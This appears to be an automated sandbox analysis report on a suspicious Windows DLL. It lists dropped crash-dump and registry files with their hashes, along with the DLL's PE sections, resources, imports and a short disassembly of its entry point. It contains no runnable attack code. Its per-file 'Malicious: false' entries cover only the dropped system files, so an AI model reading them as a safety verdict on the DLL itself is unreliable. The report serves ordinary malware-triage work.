SHA-256:	BF470317ADFF9552AA6D0DCF8D8670396BCAC888218FB8315367F8092BB7DE87
SHA-512:	A449EC0761501982A2A5F6C92433BB50E99FCED6961A46BC52811472A329C87D69D7FEF1D081D76B7F9095DF623C0716069913243124674862DF8BE0C5B145C8
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE79D.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Jan 15 03:32:59 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	45124
Entropy (8bit):	2.098341530597131
Encrypted:	false
SSDEEP:	192:iy8ESGlOJZN9hk6j8JxA7og3Nw//23doYpZDgHLPtelqSi:lSXJD9h7j8JM3Nw//QKYpZDPc3
MD5:	DAB40B8A2FE746E26BD59BF1F619D0B3
SHA1:	997A811F47D255D8D0122ABBA88DCF5C55B2AF63
SHA-256:	F92B6C9AE0E483FBCB33AC6439A2EF5037B44FF2CC6D551DDC85579E5186E2C2
SHA-512:	001F72EDDDB7281F7171FE0440AA788B119142E9BFE95BD1C45AA4D717744C4C264FD85BD5DB220859B26C7ED11066EB5AEDC378BD659BB631903B40E94BE9A0
Malicious:	false
Reputation:	unknown
Preview:	MDMP....... .......k@.a....................................$...T............%..........`.......8...........T...............D...........x...........d....................................................................U...........B..............GenuineIntelW...........T.......l...]@.a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREDA9.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8348
Entropy (8bit):	3.697343737092656
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi5Z62N6x6YJlSUnhfcgmfMSwGgUgCpBP89bjisfJhm:RrlsNin62N6x6Y7SUhfcgmfMSw/jhfe
MD5:	D514B316FFDBD11B597FD5F66CA24489
SHA1:	6D718BA8A62C1BB7319632453784636A802D7250
SHA-256:	2B1E5FC24CE57AAAFD0293E548E6B8E3593AD7F7C314DBC9A48AD30B29759D23
SHA-512:	4600C40C9A76804BFEB66637ACA1C705836E79CD0A2E172A1FEFC59E9AB08D02F1D50E5AA9FA8393A1A1526D2068B2CA512AAD6A90A4024FD70E6DFF0733C139
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.6.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF2EA.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4598
Entropy (8bit):	4.467767420732888
Encrypted:	false
SSDEEP:	48:cvIwSD8zsFJgtWI9TxVWSC8Br8fm8M4J2+dZFDA+q84pUVDKcQIcQw0jd:uITffUiSNeJHgmVDKkw0jd
MD5:	3A20FBA7560974648D5C6FD0FBE27049
SHA1:	1B2936A30334473F327037AD839B933AB7B62DAB
SHA-256:	A4BB07E9135F384984942E1A3465ECE84D992E9D258186FED1A1F8E97542996C
SHA-512:	333835F634DBA55CA56D86FE9FF0F4C2549DB4DF02E65D32E1922EDF8D5BE670CB5F8B5FB8F54A2DA2040846BC901D4832F28C699D2E4B32702D1DB6EA1FA4CD
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1342843" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Microsoft Cabinet archive data, 61414 bytes, 1 file
Category:	dropped
Size (bytes):	61414
Entropy (8bit):	7.995245868798237
Encrypted:	true
SSDEEP:	1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
MD5:	ACAEDA60C79C6BCAC925EEB3653F45E0
SHA1:	2AAAE490BCDACCC6172240FF1697753B37AC5578
SHA-256:	6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
SHA-512:	FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
Malicious:	false
Reputation:	unknown
Preview:	MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF....f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.a..x..O..V.t..Y1!.T..`U...-...< _@...\|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.1244568012511515
Encrypted:	false
SSDEEP:	6:kK/ik8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:3i9kPlE99SNxAhUeYlUSA/t
MD5:	07CC39D29F4CA82C03F8504E0C7EA130
SHA1:	70415CF2F85A8F938BD8F2B8C6EBF715C456DDFB
SHA-256:	0355462F022A6428FFBA5E817D4F32023BF3DEC73C4B4225DBE147E91525B423
SHA-512:	0BCA6521AD134F78BE1A91967464865A47D7591E941859ED86AFC636DD0565205B273FB6C3603945712F59EA047785ADCB48DF50A8C2A0617D743766A83459F8
Malicious:	false
Reputation:	unknown
Preview:	p...... .........y......(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.215110798990463
Encrypted:	false
SSDEEP:	12288:c4o+1HZRlIDertUbZuiJLXbIof4B6be/ZVg/bUcY9NZ0GEx2gqVWOA:Lo+1HZRlIDetUbxDhUz5
MD5:	868DF6447DD2874362A5BE2ADAF2146A
SHA1:	2526129D9344E32246BCC0FEC54AB4D11F103242
SHA-256:	3E47D1DB4AC1E014C1CCAC89CD1269991F017F8DB9E735BE47D7DEC809BE0C2F
SHA-512:	688BB08B5B2D3E37B256112446849179700A4FE63BA747EEBF4CB74414FE49CCE34E7DD3ED8DD9F453F2CBCAB7D71A7D5D4BD04F31477AFF1502DE9C67DC3D40
Malicious:	false
Reputation:	unknown
Preview:	regfV...V...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmB,.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	2.894669053877629
Encrypted:	false
SSDEEP:	192:nB1yi16rlb5saYd5FSETJq/bDIpn8h8i1ZV6nGoS6:nBge5lAIpn88iTVgGt6
MD5:	8E5C9B7424BDF99BA1911FB3FC1025DF
SHA1:	40EC7528423D63ED6763EE2C849B0EBED3E1BB30
SHA-256:	D7C473E994FCF24BA803756C84131603042C482D06787A0274B23AC0E749A38D
SHA-512:	D916D59AFD76CF95D68E3BB47D128E5E356DBD80DD0ADD819ADA538FA1F9208710B4BB7DA6A9D72C65DE3C62E7890CB68C83A5201290B6FE512533D2574886CB
Malicious:	false
Reputation:	unknown
Preview:	regfU...U...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmB,.....................................................................................................................................................................................................................................................................................................................................................HvLE.>......U...........%S.[..`.l..EhW..................p......hbin................p.\..,..........nk,........................................ ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ............ ........................... .......Z.......................Root........lf......Root....nk .........................}.............. ...............*...............DeviceCensus........................vk..................WritePermissionsCheck.......p...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.767598862658865
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 98.32% Windows Screen Saver (13104/52) 1.29% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ALNgwfVtrB.dll
File size:	588288
MD5:	61308ba77d051e4e76e532f9709635e0
SHA1:	95d2cd6c7be346d29735ed970d3f373d37b7e13f
SHA256:	bd2c1b86de45c3e9d0d7c85322228c3512ce2c041765d95bb613cdf12647bea9
SHA512:	2baf01ad017b6e5f2940398b8866aed84daa66a069e29e77ecad4dadf4854b206e14e1e8175f59c26f7d6d5a17ea1b2f4e258595d8a33fd4e8675898c576c618
SSDEEP:	6144:cNU5LwA22222GgngDrDRVyYli/ci2tEGW78ODQiE4tvOSk5DKXOW14IkFxVFgY4E:x5w7YM/cYVV7E5OpOJyvnHtytFyQ
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m.......................................^F......^P.n....^W.t....^Y......^A......^G......^B.....Rich....................PE..L..

File Icon


Icon Hash:	71b018ccc6577131

Static PE Info

General
Entrypoint:	0x1002eaac
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x61E03DE6 [Thu Jan 13 14:57:42 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	7f57698bb210fa88a6b01b1feaf20957

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F8A80B3FCD7h
call 00007F8A80B48548h
push dword ptr [ebp+08h]
mov ecx, dword ptr [ebp+10h]
mov edx, dword ptr [ebp+0Ch]
call 00007F8A80B3FBC1h
pop ecx
pop ebp
retn 000Ch
mov edi, edi
push ebp
mov ebp, esp
push esi
push edi
mov edi, dword ptr [ebp+10h]
mov eax, edi
sub eax, 00000000h
je 00007F8A80B412BBh
dec eax
je 00007F8A80B412A3h
dec eax
je 00007F8A80B4126Eh
dec eax
je 00007F8A80B4121Fh
dec eax
je 00007F8A80B4118Fh
mov ecx, dword ptr [ebp+0Ch]
mov eax, dword ptr [ebp+08h]
push ebx
push 00000020h
pop edx
jmp 00007F8A80B40147h
mov esi, dword ptr [eax]
cmp esi, dword ptr [ecx]
je 00007F8A80B3FD4Eh
movzx esi, byte ptr [eax]
movzx ebx, byte ptr [ecx]
sub esi, ebx
je 00007F8A80B3FCE7h
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, dword ptr [ebx+ebx-01h]
mov esi, ebx
test esi, esi
jne 00007F8A80B4013Fh
movzx esi, byte ptr [eax+01h]
movzx ebx, byte ptr [ecx+01h]
sub esi, ebx
je 00007F8A80B3FCE7h
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, dword ptr [ebx+ebx-01h]
mov esi, ebx
test esi, esi
jne 00007F8A80B4011Eh
movzx esi, byte ptr [eax+02h]
movzx ebx, byte ptr [ecx+02h]
sub esi, ebx
je 00007F8A80B3FCE7h
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, dword ptr [ebx+ebx-01h]
mov esi, ebx
test esi, esi
jne 00007F8A80B400FDh

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[ C ] VS2005 build 50727
[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[EXP] VS2008 build 21022
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x50bc0	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4f538	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x89000	0x3410	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8d000	0x415c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4bd00	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x47000	0x454	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x4f4b0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x45bb9	0x45c00	False	0.379756804435	data	6.37093799262	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x47000	0x9c10	0x9e00	False	0.357397151899	data	5.22204269745	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x51000	0x3735c	0x33800	False	0.741035535498	data	6.11335979295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x89000	0x3410	0x3600	False	0.306640625	data	4.34913645958	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8d000	0x8c34	0x8e00	False	0.346308318662	data	4.00973830682	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x89ac0	0x134	data	Chinese	China
RT_CURSOR	0x89bf4	0xb4	data	Chinese	China
RT_CURSOR	0x89ca8	0x134	AmigaOS bitmap font	Chinese	China
RT_CURSOR	0x89ddc	0x134	data	Chinese	China
RT_CURSOR	0x89f10	0x134	data	Chinese	China
RT_CURSOR	0x8a044	0x134	data	Chinese	China
RT_CURSOR	0x8a178	0x134	data	Chinese	China
RT_CURSOR	0x8a2ac	0x134	data	Chinese	China
RT_CURSOR	0x8a3e0	0x134	data	Chinese	China
RT_CURSOR	0x8a514	0x134	data	Chinese	China
RT_CURSOR	0x8a648	0x134	data	Chinese	China
RT_CURSOR	0x8a77c	0x134	data	Chinese	China
RT_CURSOR	0x8a8b0	0x134	AmigaOS bitmap font	Chinese	China
RT_CURSOR	0x8a9e4	0x134	data	Chinese	China
RT_CURSOR	0x8ab18	0x134	data	Chinese	China
RT_CURSOR	0x8ac4c	0x134	data	Chinese	China
RT_BITMAP	0x8ad80	0xb8	data	Chinese	China
RT_BITMAP	0x8ae38	0x144	data	Chinese	China
RT_ICON	0x8af7c	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676	Chinese	China
RT_ICON	0x8b264	0x128	GLS_BINARY_LSB_FIRST	Chinese	China
RT_DIALOG	0x8b38c	0x33c	data	Chinese	China
RT_DIALOG	0x8b6c8	0xe2	data	Chinese	China
RT_DIALOG	0x8b7ac	0x34	data	Chinese	China
RT_STRING	0x8b7e0	0x4e	data	Chinese	China
RT_STRING	0x8b830	0x2c	data	Chinese	China
RT_STRING	0x8b85c	0x82	data	Chinese	China
RT_STRING	0x8b8e0	0x1d6	data	Chinese	China
RT_STRING	0x8bab8	0x160	data	Chinese	China
RT_STRING	0x8bc18	0x12e	data	Chinese	China
RT_STRING	0x8bd48	0x50	data	Chinese	China
RT_STRING	0x8bd98	0x44	data	Chinese	China
RT_STRING	0x8bddc	0x68	data	Chinese	China
RT_STRING	0x8be44	0x1b8	data	Chinese	China
RT_STRING	0x8bffc	0x104	data	Chinese	China
RT_STRING	0x8c100	0x24	data	Chinese	China
RT_STRING	0x8c124	0x30	data	Chinese	China
RT_GROUP_CURSOR	0x8c154	0x22	Lotus unknown worksheet or configuration, revision 0x2	Chinese	China
RT_GROUP_CURSOR	0x8c178	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c18c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c1a0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c1b4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c1c8	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c1dc	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c1f0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c204	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c218	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c22c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c240	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c254	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c268	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c27c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_ICON	0x8c290	0x22	data	Chinese	China
RT_MANIFEST	0x8c2b4	0x15a	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	GetOEMCP, GetCommandLineA, RtlUnwind, ExitProcess, HeapReAlloc, RaiseException, HeapSize, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetACP, IsValidCodePage, LCMapStringA, LCMapStringW, HeapCreate, HeapDestroy, GetStdHandle, GetCPInfo, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetConsoleCP, GetConsoleMode, GetStringTypeA, GetStringTypeW, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, GetLocaleInfoW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetModuleHandleW, CreateFileA, GetCurrentProcess, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, InterlockedIncrement, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, GlobalReAlloc, TlsGetValue, LocalAlloc, WritePrivateProfileStringA, GlobalFlags, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSection, GlobalGetAtomNameA, GlobalFindAtomA, lstrcmpW, GetVersionExA, FormatMessageA, LocalFree, lstrlenA, InterlockedDecrement, MulDiv, MultiByteToWideChar, GlobalUnlock, GlobalFree, FreeResource, GlobalAddAtomA, GetCurrentProcessId, GetLastError, GlobalDeleteAtom, GetCurrentThread, GetCurrentThreadId, ConvertDefaultLocale, EnumResourceLanguagesA, GetModuleFileNameA, GetLocaleInfoA, WideCharToMultiByte, CompareStringA, FindResourceA, LoadResource, LockResource, SizeofResource, InterlockedExchange, GlobalLock, lstrcmpA, GlobalAlloc, GetModuleHandleA, CreateThread, CloseHandle, VirtualProtect, LoadLibraryA, VirtualAlloc, GetProcAddress, SetLastError, Sleep, IsBadReadPtr, GetProcessHeap, VirtualFree, HeapFree, HeapAlloc, FreeLibrary, VirtualQuery, SetHandleCount, GetNativeSystemInfo
USER32.dll	LoadCursorA, GetSysColorBrush, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, GetDlgItemTextA, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, GetCapture, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, GetForegroundWindow, GetTopWindow, GetMessageTime, GetMessagePos, MapWindowPoints, SetMenu, SetForegroundWindow, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, AdjustWindowRectEx, CopyRect, PtInRect, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, SetWindowPos, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, GetMenuItemID, GetMenuItemCount, GetSubMenu, UnhookWindowsHookEx, GetSysColor, EndPaint, BeginPaint, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, GetWindowTextLengthA, GetWindowTextA, GetWindow, SetFocus, GetDesktopWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, IsWindow, GetDlgItem, GetNextDlgTabItem, EndDialog, SetWindowsHookExA, CallNextHookEx, GetMessageA, DestroyMenu, UpdateWindow, TranslateMessage, DispatchMessageA, GetActiveWindow, IsWindowVisible, GetKeyState, PeekMessageA, GetCursorPos, ValidateRect, GetWindowThreadProcessId, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, MessageBoxA, SetCursor, PostQuitMessage, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, LoadBitmapA, GetFocus, GetParent, ModifyMenuA, GetMenuState, EnableMenuItem, CheckMenuItem, SetTimer, IsIconic, KillTimer, LoadIconA, DrawIcon, GetClientRect, SendMessageA, ShowWindow, PostMessageA, GetSystemMetrics, EnableWindow, GetMenu
GDI32.dll	GetStockObject, SelectObject, GetDeviceCaps, DeleteDC, Escape, ExtTextOutA, TextOutA, RectVisible, ScaleWindowExtEx, SetWindowExtEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, CreateBitmap, PtVisible, GetObjectA, DeleteObject, GetClipBox, SetMapMode, SetTextColor, SetBkColor, RestoreDC, SaveDC, SetViewportOrgEx
WINSPOOL.DRV	DocumentPropertiesA, ClosePrinter, OpenPrinterA
ADVAPI32.dll	RegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegOpenKeyA, RegEnumKeyA, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey
SHLWAPI.dll	PathFindExtensionA
OLEAUT32.dll	VariantClear, VariantChangeType, VariantInit
WS2_32.dll	htons, setsockopt, sendto, htonl, bind, socket, closesocket, inet_addr, recvfrom, WSACleanup, WSAStartup

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x1001df20

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Snort IDS Alerts

